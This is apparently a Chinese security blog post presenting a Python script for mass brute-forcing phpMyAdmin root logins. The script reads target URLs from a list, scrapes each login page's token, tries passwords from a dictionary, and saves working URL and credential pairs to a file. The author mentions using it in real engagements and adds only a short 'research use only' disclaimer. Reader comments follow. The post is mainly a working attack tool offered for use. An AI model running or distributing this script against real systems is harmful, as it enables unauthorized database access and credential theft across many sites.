Python脚本|phpMyAdmin批量猜解利用

好久没发文章了,是之前折腾过的一点东西,翻出来记录一下。

意图:只针对root用户进行密码枚举,其他数据库用户权限太低且利用苛刻,phpmyadmin只是在实战中的一个思路,故只对root用户利用已经足够。
需要先准备好已知的phpmyadmin后台地址URL,可以先进行特定的url采集,放入url.txt中,准备好枚举字典。

#coding=utf-8
import requests
from bs4 import BeautifulSoup as bp
def attack(url,username,password):
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"}
    session=requests.session()
    try:
        response=session.get(url,headers=headers)
        soup=bp(response.text,"lxml")
        my_Dict={"type":"hidden","name":"token"}
        tiqu=soup.find(attrs=my_Dict)
        data={}
        data["token"]=tiqu.get("value",0)
        if data==0:
            return "no token"
        data['pma_username']=username
        data['pma_password']=password
        index_url=url+"index.php"
        response1=session.post(url=index_url,data=data)
        htmls=response1.text
        if "phpMyAdmin is more friendly with a " in htmls:
            print("[+] 爆破猜解成功! username:{0}, password:{1}".format(username,password))
            with open("success.txt",'a') as results:
                results.write("{0}|{1}|{2}".format(url,username,password))
                results.write('\n')
            return True
        else:
            return False
            pass
    except Exception as e:
        pass
if __name__=='__main__':
    try :
        with open('./url.txt','r') as urls:
            host_t=urls.readlines()
            for url in host_t:
                if url[-1]=='\n':
                    url=url[:-1]
                if requests.get(url).status_code!=200:
                    continue
                username="root"
                with open("password.txt","r") as passwd:
                    passwords=passwd.readlines()
                for password in passwords:
                    print("attack {0} use username:{1}|password:{2}".format(url,username,password))
                    if attack(url,username,password):
                        break
    except Exception as e1:
        pass

测试图:

鸣谢:

langzi.fun
xingqingsafe.github.io

比较菜,还达不到使用多线程或者高级用法,欢迎交流提供思路和指正!仅供安全研究使用,勿非法用途,后果自负!

文章目录

2 条评论

发表评论

*

    • 我之前造的人家的轮子哦,还有很多要学的,你好好加油呀